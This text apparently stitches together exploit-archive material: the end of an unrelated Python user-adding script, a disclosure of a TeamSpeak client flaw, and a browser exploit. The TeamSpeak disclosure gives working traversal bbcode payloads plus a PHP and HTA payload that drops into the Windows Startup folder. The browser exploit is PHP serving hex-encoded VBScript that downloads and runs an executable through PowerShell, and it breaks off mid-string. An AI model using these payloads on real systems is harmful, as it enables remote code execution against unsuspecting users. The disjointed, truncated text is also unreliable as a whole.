raw_input('Press Enter to continue...')
elif usr_input == '3':
if not addOwnUser(UNS, IP, InactiveUserIndOff):
addOwnUser(UNS, IP, ActiveUserIndOff)
raw_input('Press Enter to continue...')
else:
print 'Please choose a sensible input next time, exiting.'
input('Press Enter to continue...')
sys.exit()
Exploit Title: "PwnSpeak" a 0day Exploit for TeamSpeak Client <= 3.0.18.1 RFI to RCE
Date: 12/10/2015
Author: Scurippio <scurippio@anche.no> / (0x6FB30B11 my pgp keyid)
Vendor Homepage: https://www.teamspeak.com/
Application: TeamSpeak 3
Version: TeamSpeak3 Client 3.0.0 - 3.0.18.1
Platforms: Windows, Mac OS X and Linux
Exploitation: Remote
Risk : Very High
=========
The Bug
=========
The bug is a simple but Critical RFI(Remote File Inclusion), and in my test case on "Windows" you can reach remote code execution.
By changing the channel description you can insert a [img] bb tag with malicious content.
There are a few problems with the image caching on disk.
1: There is no check on file extension.
2: There is no file renaming, and you can fake the extension so you can create in the cache a malicious executable file like hta, scr, msi, pif, vbs etc.
Example:
[img] http://yourevilhost.com/thefile.hta [/img]
[img] http://yourevilhost.com/thefile.msi [/img]
[img] http://yourevilhost.com/thefile.vbs [/img]
...
3: Teamspeak 3 Client saves the image and recreates the same directory structure as the server where it's hosted.
Example:
C:\Users\YourUser\AppData\Roaming\TS3Client\cache\remote\yourevilhost.com\thefile.hta
C:\Users\YourUser\AppData\Roaming\TS3Client\cache\remote\yourevilhost.com\thefile.msi
C:\Users\YourUser\AppData\Roaming\TS3Client\cache\remote\yourevilhost.com\thefile.vbs
...
4: It is possible to do a Directory Traversal with a simple urlencode of the traversal path bypassing the built-in control.
This is the critical hole, if you combine the previous vulnerabilities you can save a malicious file in any path on the OS with the same permissions as Teamspeak client.
Example:
[img]http://evildomain.com/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cDesktop%5cOwnedByNonnOreste.hta[/img]
If you set this bbcode on a channel description every user that sees it will download a file named "OwnedByNonnOreste.hta" on their Desktop with 0byte, you can also put images or other file extension!
The built-in image fetcher in the Teamspeak client checks the content type and the file header to check if the response is a real image, but you can easily bypass this control and put your exploit payload.
==========================================
Bypass / Vector / Payload
==========================================
To bypass the control and put arbitrary data in your malicious file you only need a web server and you can easily set the Rewrite rule for the Exploitation.
Example:
RewriteEngine On
RewriteCond %{REQUEST_URI} !/faker.php
RewriteRule .* /faker.php
Then you need to write a simple php script to fake the payload as a png by sending the right content type and file header.
Example:
<?php
header ('Content-type: image/png');
echo "\211PNG\r\n\032\n";
?>
<html>
<head>
<title>PWN3D</title>
<HTA:APPLICATION
APPLICATIONNAME="OwnedByScurippio"
ID="SnappySnappySna"
VERSION="1.0"/>
<script language="VBScript">
Sub RunProgram
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "calc.exe"
End Sub
RunProgram
</script>
</head>
</html>
If you save the file in the windows startup directory you can achieve a remote code execution.
Example:
[img]http://example.com/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cRoaming%5cMicrosoft%5cWindows%5cStart%20Menu%5cPrograms%5cStartup%5cWelcomeAndOwnedByNonnOreste.hta[/img]
[img]http://example.com/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cRoaming%5cMicrosoft%5cWindows%5cStart%20Menu%5cPrograms%5cStartup%5cWelcomeAndOwnedByNonnOreste.hta[/img]
The HTA file is a prefect vector for this exploit, you can execute trusted vb script (shell command or anything else) and the png header doesn't compromise the markup language syntax.
At the next OS boot the victim will execute the malicious HTA file.
=======
Fix
=======
Update to beta channel or wait the 3.0.18.2 hotfix for this exploit!
======
Info
======
10/20/2015 - I have reported this Vulnerability to Teamspeak developers team
********* - Release the public exploit
- Fuck the 'Captatori' - Tracciabili
(Snappy is always with you :P )
Copyright (c) 2015 Scurippio
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without mine express
written consent. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please email me for permission.
Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
#!/usr/bin/php
<?php
##########################################################
# Author : Ehsan Noreddini
# E-Mail : me@ehsann.info
# Social : @prot3ct0r
# Title : The World Browser Remote Code Execution
# TheWorld Browser is a tiny, fast and powerful web Browser. It is completely free. There is no function limitation.
# Version : 3.0 Final
# Date : 22 October 2015
# CVE : CVE2014-6332
# Tested on : Windows7
# Download : http://theworld.cn/twen/download.html
# Website : http://theworld.cn
##########################################################
# 1. run php code : php exploit.php
# 2. get the output address and open it in browser !
##########################################################
# shot : http://ehsann.info/proof/The_World_Browser_R_C_E.png
# Original Code : http://ehsann.info/exploit/4.txt
##########################################################
print "TheWorld Browser Remote Code Execution Exploit \r\n";
$port=80; # Port Address
$link="http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe"; # Your malicious file
$socket = socket_create(AF_INET, SOCK_STREAM, 0) or die('Failed to create socket!');
socket_bind($socket, 0,$port);
socket_listen($socket);
# MS14-064
$msgd = "\x3C\x68\x74\x6D\x6C\x3E\x0D\x0A\x3C\x6D\x65\x74\x61\x20\x68\x74\x74\x70\x2D\x65\x71\x75\x69\x76\x3D\x22\x58\x2D\x55\x41\x2D\x43\x6F\x6D\x70\x61\x74\x69\x62\x6C\x65\x22\x20\x63\x6F\x6E\x74\x65\x6E\x74\x3D\x22\x49\x45\x3D\x45\x6D\x75\x6C\x61\x74\x65\x49\x45\x38\x22\x20\x3E\x0D\x0A\x3C\x68\x65\x61\x64\x3E\x0D\x0A\x3C\x2F\x68\x65\x61\x64\x3E\x0D\x0A\x3C\x62\x6F\x64\x79\x3E\x0D\x0A\x20\x0D\x0A\x3C\x53\x43\x52\x49\x50\x54\x20\x4C\x41\x4E\x47\x55\x41\x47\x45\x3D\x22\x56\x42\x53\x63\x72\x69\x70\x74\x22\x3E\x0D\x0A\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x72\x75\x6E\x6D\x75\x6D\x61\x61\x28\x29\x20\x0D\x0A\x4F\x6E\x20\x45\x72\x72\x6F\x72\x20\x52\x65\x73\x75\x6D\x65\x20\x4E\x65\x78\x74\x0D\x0A\x73\x65\x74\x20\x73\x68\x65\x6C\x6C\x3D\x63\x72\x65\x61\x74\x65\x6F\x62\x6A\x65\x63\x74\x28\x22\x53\x68\x65\x6C\x6C\x2E\x41\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x22\x29\x0D\x0A\x63\x6F\x6D\x6D\x61\x6E\x64\x3D\x22\x49\x6E\x76\x6F\x6B\x65\x2D\x45\x78\x70\x72\x65\x73\x73\x69\x6F\x6E\x20\x24\x28\x4E\x65\x77\x2D\x4F\x62\x6A\x65\x63\x74\x20\x53\x79\x73\x74\x65\x6D\x2E\x4E\x65\x74\x2E\x57\x65\x62\x43\x6C\x69\x65\x6E\x74\x29\x2E\x44\x6F\x77\x6E\x6C\x6F\x61\x64\x46\x69\x6C\x65\x28\x27\x44\x4F\x57\x4E\x4C\x4F\x41\x44\x27\x2C\x27\x6C\x6F\x61\x64\x2E\x65\x78\x65\x27\x29\x3B\x24\x28\x4E\x65\x77\x2D\x4F\x62\x6A\x65\x63\x74\x20\x2D\x63\x6F\x6D\x20\x53\x68\x65\x6C\x6C\x2E\x41\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x29\x2E\x53\x68\x65\x6C\x6C\x45\x78\x65\x63\x75\x74\x65\x28\x27\x6C\x6F\x61\x64\x2E\x65\x78\x65\x27\x29\x3B\x22\x0D\x0A\x73\x68\x65\x6C\x6C\x2E\x53\x68\x65\x6C\x6C\x45\x78\x65\x63\x75\x74\x65\x20\x22\x70\x6F\x77\x65\x72\x73\x68\x65\x6C\x6C\x2E\x65\x78\x65\x22\x2C\x20\x22\x2D\x43\x6F\x6D\x6D\x61\x6E\x64\x20\x22\x20\x26\x20\x63\x6F\x6D\x6D\x61\x6E\x64\x2C\x20\x22\x22\x2C\x20\x22\x72\x75\x6E\x61\x73\x22\x2C\x20\x30\x0D\x0A\x65\x6E\x64\x20\x66\x75\x6E\x63\x74\x69\x6F\x6E\x0D\x0A\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E\x0D\x0A\x20\x0D\x0A\x3C\x53\x43\x52\x49\x50\x54\x20\x4C\x41\x4E\x47\x55\x41\x47\x45\x3D\x22\x56\x42\x53\x63\x72\x69\x70\x74\x22\x3E\x0D\x0A\x20\x20\x0D\x0A\x64\x69\x6D\x20\x20\x20\x61\x61\x28\x29\x0D\x0A\x64\x69\x6D\x20\x20\x20\x61\x62\x28\x29\x0D\x0A\x64\x69\x6D\x20\x20\x20\x61\x30\x0D\x0A\x64\x69\x6D\x20\x20\x20\x61\x31\x0D\x0A\x64\x69\x6D\x20\x20\x20\x61\x32\x0D\x0A\x64\x69\x6D\x20\x20\x20\x61\x33\x0D\x0A\x64\x69\x6D\x20\x20\x20\x77\x69\x6E\x39\x78\x0D\x0A\x64\x69\x6D\x20\x20\x20\x69\x6E\x74\x56\x65\x72\x73\x69\x6F\x6E\x0D\x0A\x64\x69\x6D\x20\x20\x20\x72\x6E\x64\x61\x0D\x0A\x64\x69\x6D\x20\x20\x20\x66\x75\x6E\x63\x6C\x61\x73\x73\x0D\x0A\x64\x69\x6D\x20\x20\x20\x6D\x79\x61\x72\x72\x61\x79\x0D\x0A\x20\x0D\x0A\x42\x65\x67\x69\x6E\x28\x29\x0D\x0A\x20\x0D\x0A\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x42\x65\x67\x69\x6E\x28\x29\x0D\x0A\x20\x20\x4F\x6E\x20\x45\x72\x72\x6F\x72\x20\x52\x65\x73\x75\x6D\x65\x20\x4E\x65\x78\x74\x0D\x0A\x20\x20\x69\x6E\x66\x6F\x3D\x4E\x61\x76\x69\x67\x61\x74\x6F\x72\x2E\x55\x73\x65\x72\x41\x67\x65\x6E\x74\x0D\x0A\x20\x0D\x0A\x20\x20\x69\x66\x28\x69\x6E\x73\x74\x72\x28\x69\x6E\x66\x6F\x2C\x22\x57\x69\x6E\x36\x34\x22\x29\x3E\x30\x29\x20\x20\x20\x74\x68\x65\x6E\x0D\x0A\x20\x20\x20\x20\x20\x65\x78\x69\x74\x20\x20\x20\x66\x75\x6E\x63\x74\x69\x6F\x6E\x0D\x0A\x20\x20\x65\x6E\x64\x20\x69\x66\x0D\x0A\x20\x0D\x0A\x20\x20\x69\x66\x20\x28\x69\x6E\x73\x74\x72\x28\x69\x6E\x66\x6F\x2C\x22\x4D\x53\x49\x45\x22\x29\x3E\x30\x29\x20\x20\x20\x74\x68\x65\x6E\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6E\x74\x56\x65\x72\x73\x69\x6F\x6E\x20\x3D\x20\x43\x49\x6E\x74\x28\x4D\x69\x64\x28\x69\x6E\x66\x6F\x2C\x20\x49\x6E\x53\x74\x72\x28\x69\x6E\x66\x6F\x2C\x20\x22\x4D\x53\x49\x45\x22\x29\x20\x2B\x20\x35\x2C\x20\x32\x29\x29\x20\x20\x20\x0D\x0A\x20\x20\x65\x6C\x73\x65\x0D\x0A\x20\x20\x20\x20\x20\x65\x78\x69\x74\x20\x20\x20\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x65\x6E\x64\x20\x69\x66\x0D\x0A\x20\x0D\x0A\x20\x20\x77\x69\x6E\x39\x78\x3D\x30\x0D\x0A\x20\x0D\x0A\x20\x20\x42\x65\x67\x69\x6E\x49\x6E\x69\x74\x28\x29\x0D\x0A\x20\x20\x49\x66\x20\x43\x72\x65\x61\x74\x65\x28\x29\x3D\x54\x72\x75\x65\x20\x54\x68\x65\x6E\x0D\x0A\x20\x20\x20\x20\x20\x6D\x79\x61\x72\x72\x61\x79\x3D\x20\x20\x20\x20\x20\x20\x20\x20\x63\x68\x72\x77\x28\x30\x31\x29\x26\x63\x68\x72\x77\x28\x32\x31\x37\x36\x29\x26\x63\x68\x72\x77\x28\x30\x31\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x0D\x0A\x20\x20\x20\x20\x20\x6D\x79\x61\x72\x72\x61\x79\x3D\x6D\x79\x61\x72\x72\x61\x79\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28\x33\x32\x37\x36\x37\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28\x30\x29\x0D\x0A\x20\x0D\x0A\x20\x20\x20\x20\x20\x69\x66\x28\x69\x6E\x74\x56\x65\x72\x73\x69\x6F\x6E\x3C\x34\x29\x20\x74\x68\x65\x6E\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x77\x72\x69\x74\x65\x28\x22\x3C\x62\x72\x3E\x20\x49\x45\x22\x29\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x77\x72\x69\x74\x65\x28\x69\x6E\x74\x56\x65\x72\x73\x69\x6F\x6E\x29\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x75\x6E\x73\x68\x65\x6C\x6C\x63\x6F\x64\x65\x28\x29\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x65\x6C\x73\x65\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x65\x74\x6E\x6F\x74\x73\x61\x66\x65\x6D\x6F\x64\x65\x28\x29\x0D\x0A\x20\x20\x20\x20\x20\x65\x6E\x64\x20\x69\x66\x0D\x0A\x20\x20\x65\x6E\x64\x20\x69\x66\x0D\x0A\x65\x6E\x64\x20\x66\x75\x6E\x63\x74\x69\x6F\x6E\x0D\x0A\x20\x0D\x0A\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x42\x65\x67\x69\x6E\x49\x6E\x69\x74\x28\x29\x0D\x0A\x20\x20\x20\x52\x61\x6E\x64\x6F\x6D\x69\x7A\x65\x28\x29\x0D\x0A\x20\x20\x20\x72\x65\x64\x69\x6D\x20\x61\x61\x28\x35\x29\x0D\x0A\x20\x20\x20\x72\x65\x64\x69\x6D\x20\x61\x62\x28\x35\x29\x0D\x0A\x20\x20\x20\x61\x30\x3D\x31\x33\x2B\x31\x37\x2A\x72\x6E\x64\x28\x36\x29\x0D\x0A\x20\x20\x20\x61\x33\x3D\x37\x2B\x33\x2A\x72\x6E\x64\x28\x35\x29\x0D\x0A\x65\x6E\x64\x20\x66\x75\x6E\x63\x74\x69\x6F\x6E\x0D\x0A\x20\x0D\x0A\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x43\x72\x65\x61\x74\x65\x28\x29\x0D\x0A\x20\x20\x4F\x6E\x20\x45\x72\x72\x6F\x72\x20\x52\x65\x73\x75\x6D\x65\x20\x4E\x65\x78\x74\x0D\x0A\x20\x20\x64\x69\x6D\x20\x69\x0D\x0A\x20\x20\x43\x72\x65\x61\x74\x65\x3D\x46\x61\x6C\x73\x65\x0D\x0A\x20\x20\x46\x6F\x72\x20\x69\x20\x3D\x20\x30\x20\x54\x6F\x20\x34\x30\x30\x0D\x0A\x20\x20\x20\x20\x49\x66\x20\x4F\x76\x65\x72\x28\x29\x3D\x54\x72\x75\x65\x20\x54\x68\x65\x6E\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x43\x72\x65\x61\x74\x65\x3D\x54\x72\x75\x65\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x45\x78\x69\x74\x20\x46\x6F\x72\x0D\x0A\x20\x20\x20\x20\x45\x6E\x64\x20\x49\x66\x20\x0D\x0A\x20\x20\x4E\x65\x78\x74\x0D\x0A\x65\x6E\x64\x20\x66\x75\x6E\x63\x74\x69\x6F\x6E\x0D\x0A\x20\x0D\x0A\x73\x75\x62\x20\x74\x65\x73\x74\x61\x61\x28\x29\x0D\x0A\x65\x6E\x64\x20\x73\x75\x62\x0D\x0A\x20\x0D\x0A\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x6D\x79\x64\x61\x74\x61\x28\x29\x0D\x0A\x20\x20\x20\x20\x4F\x6E\x20\x45\x72\x72\x6F\x72\x20\x52\x65\x73\x75\x6D\x65\x20\x4E\x65\x78\x74\x0D\x0A\x20\x20\x20\x20\x20\x69\x3D\x74\x65\x73\x74\x61\x61\x0D\x0A\x20\x20\x20\x20\x20\x69\x3D\x6E\x75\x6C\x6C\x0D\x0A\x20\x20\x20\x20\x20\x72\x65\x64\x69\x6D\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x32\x29\x20\x20\x0D\x0A\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3D\x30\x0D\x0A\x20\x20\x20\x20\x20\x61\x61\x28\x61\x31\x29\x3D\x69\x0D\x0A\x20\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3D\x36\x2E\x33\x36\x35\x39\x38\x37\x33\x37\x34\x33\x37\x38\x30\x31\x45\x2D\x33\x31\x34\x0D\x0A\x20\x0D\x0A\x20\x20\x20\x20\x20\x61\x61\x28\x61\x31\x2B\x32\x29\x3D\x6D\x79\x61\x72\x72\x61\x79\x0D\x0A\x20\x20\x20\x20\x20\x61\x62\x28\x32\x29\x3D\x31\x2E\x37\x34\x30\x38\x38\x35\x33\x34\x37\x33\x31\x33\x32\x34\x45\x2D\x33\x31\x30\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x6D\x79\x64\x61\x74\x61\x3D\x61\x61\x28\x61\x31\x29\x0D\x0A\x20\x20\x20\x20\x20\x72\x65\x64\x69\x6D\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x20\x20\x0D\x0A\x65\x6E\x64\x20\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x0D\x0A\x20\x0D\x0A\x20\x0D\x0A\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x73\x65\x74\x6E\x6F\x74\x73\x61\x66\x65\x6D\x6F\x64\x65\x28\x29\x0D\x0A\x20\x20\x20\x20\x4F\x6E\x20\x45\x72\x72\x6F\x72\x20\x52\x65\x73\x75\x6D\x65\x20\x4E\x65\x78\x74\x0D\x0A\x20\x20\x20\x20\x69\x3D\x6D\x79\x64\x61\x74\x61\x28\x29\x20\x20\x0D\x0A\x20\x20\x20\x20\x69\x3D\x72\x75\x6D\x28\x69\x2B\x38\x29\x0D\x0A\x20\x20\x20\x20\x69\x3D\x72\x75\x6D\x28\x69\x2B\x31\x36\x29\x0D\x0A\x20\x20\x20\x20\x6A\x3D\x72\x75\x6D\x28\x69\x2B\x26\x68\x31\x33\x34\x29\x20\x20\x0D\x0A\x20\x20\x20\x20\x66\x6F\x72\x20\x6B\x3D\x30\x20\x74\x6F\x20\x26\x68\x36\x30\x20\x73\x74\x65\x70\x20\x34\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x6A\x3D\x72\x75\x6D\x28\x69\x2B\x26\x68\x31\x32\x30\x2B\x6B\x29\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28\x6A\x3D\x31\x34\x29\x20\x74\x68\x65\x6E\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6A\x3D\x30\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x64\x69\x6D\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x32\x29\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x61\x61\x28\x61\x31\x2B\x32\x29\x28\x69\x2B\x26\x68\x31\x31\x63\x2B\x6B\x29\x3D\x61\x62\x28\x34\x29\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x64\x69\x6D\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x20\x20\x0D\x0A\x20\x0D\x0A\x20\x20\x20\x20\x20\x6A\x3D\x30\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6A\x3D\x72\x75\x6D\x28\x69\x2B\x26\x68\x31\x32\x30\x2B\x6B\x29\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x45\x78\x69\x74\x20\x66\x6F\x72\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6E\x64\x20\x69\x66\x0D\x0A\x20\x0D\x0A\x20\x20\x20\x20\x6E\x65\x78\x74\x20\x0D\x0A\x20\x20\x20\x20\x61\x62\x28\x32\x29\x3D\x31\x2E\x36\x39\x37\x35\x39\x36\x36\x33\x33\x31\x36\x37\x34\x37\x45\x2D\x33\x31\x33\x0D\x0A\x20\x20\x20\x20\x72\x75\x6E\x6D\x75\x6D\x61\x61\x28\x29\x20\x0D\x0A\x65\x6E\x64\x20\x66\x75\x6E\x63\x74\x69\x6F\x6E\x0D\x0A\x20\x0D\x0A\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x4F\x76\x65\x72\x28\x29\x0D\x0A\x20\x20\x20\x20\x4F\x6E\x20\x45\x72\x72\x6F\x72\x20\x52\x65\x73\x75\x6D\x65\x20\x4E\x65\x78\x74\x0D\x0A\x20\x20\x20\x20\x64\x69\x6D\x20\x74\x79\x70\x65\x31\x2C\x74\x79\x70\x65\x32\x2C\x74\x79\x70\x65\x33\x0D\x0A\x20\x20\x20\x20\x4F\x76\x65\x72\x3D\x46\x61\x6C\x73\x65\x0D\x0A\x20\x20\x20\x20\x61\x30\x3D\x61\x30\x2B\x61\x33\x0D\x0A\x20\x20\x20\x20\x61\x31\x3D\x61\x30\x2B\x32\x0D\x0A\x20\x20\x20\x20\x61\x32\x3D\x61\x30\x2B\x26\x68\x38\x30\x30\x30\x30\x30\x30\x0D\x0A\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x72\x65\x64\x69\x6D\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x20\x0D\x0A\x20\x20\x20\x20\x72\x65\x64\x69\x6D\x20\x20\x20\x61\x62\x28\x61\x30\x29\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x72\x65\x64\x69\x6D\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x32\x29\x0D\x0A\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x74\x79\x70\x65\x31\x3D\x31\x0D\x0A\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3D\x31\x2E\x31\x32\x33\x34\x35\x36\x37\x38\x39\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x30\x0D\x0A\x20\x20\x20\x20\x61\x61\x28\x61\x30\x29\x3D\x31\x30\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x49\x66\x28\x49\x73\x4F\x62\x6A\x65\x63\x74\x28\x61\x61\x28\x61\x31\x2D\x31\x29\x29\x20\x3D\x20\x46\x61\x6C\x73\x65\x29\x20\x54\x68\x65\x6E\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28\x69\x6E\x74\x56\x65\x72\x73\x69\x6F\x6E\x3C\x34\x29\x20\x74\x68\x65\x6E\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6D\x65\x6D\x3D\x63\x69\x6E\x74\x28\x61\x30\x2B\x31\x29\x2A\x31\x36\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6A\x3D\x76\x61\x72\x74\x79\x70\x65\x28\x61\x61\x28\x61\x31\x2D\x31\x29\x29\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28\x28\x6A\x3D\x6D\x65\x6D\x2B\x34\x29\x20\x6F\x72\x20\x28\x6A\x2A\x38\x3D\x6D\x65\x6D\x2B\x38\x29\x29\x20\x74\x68\x65\x6E\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28\x76\x61\x72\x74\x79\x70\x65\x28\x61\x61\x28\x61\x31\x2D\x31\x29\x29\x3C\x3E\x30\x29\x20\x20\x54\x68\x65\x6E\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x49\x66\x28\x49\x73\x4F\x62\x6A\x65\x63\x74\x28\x61\x61\x28\x61\x31\x29\x29\x20\x3D\x20\x46\x61\x6C\x73\x65\x20\x29\x20\x54\x68\x65\x6E\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x74\x79\x70\x65\x31\x3D\x56\x61\x72\x54\x79\x70\x65\x28\x61\x61\x28\x61\x31\x29\x29\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6E\x64\x20\x69\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6E\x64\x20\x69\x66\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6C\x73\x65\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x64\x69\x6D\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x20\x20\x66\x75\x6E\x63\x74\x69\x6F\x6E\x0D\x0A\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6E\x64\x20\x69\x66\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6C\x73\x65\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28\x76\x61\x72\x74\x79\x70\x65\x28\x61\x61\x28\x61\x31\x2D\x31\x29\x29\x3C\x3E\x30\x29\x20\x20\x54\x68\x65\x6E\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x49\x66\x28\x49\x73\x4F\x62\x6A\x65\x63\x74\x28\x61\x61\x28\x61\x31\x29\x29\x20\x3D\x20\x46\x61\x6C\x73\x65\x20\x29\x20\x54\x68\x65\x6E\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x74\x79\x70\x65\x31\x3D\x56\x61\x72\x54\x79\x70\x65\x28\x61\x61\x28\x61\x31\x29\x29\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6E\x64\x20\x69\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6E\x64\x20\x69\x66\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6E\x64\x20\x69\x66\x0D\x0A\x20\x20\x20\x20\x65\x6E\x64\x20\x69\x66\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x49\x66\x28\x74\x79\x70\x65\x31\x3D\x26\x68\x32\x66\x36\x36\x29\x20\x54\x68\x65\x6E\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x4F\x76\x65\x72\x3D\x54\x72\x75\x65\x20\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x45\x6E\x64\x20\x49\x66\x20\x20\x0D\x0A\x20\x20\x20\x20\x49\x66\x28\x74\x79\x70\x65\x31\x3D\x26\x68\x42\x39\x41\x44\x29\x20\x54\x68\x65\x6E\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x4F\x76\x65\x72\x3D\x54\x72\x75\x65\x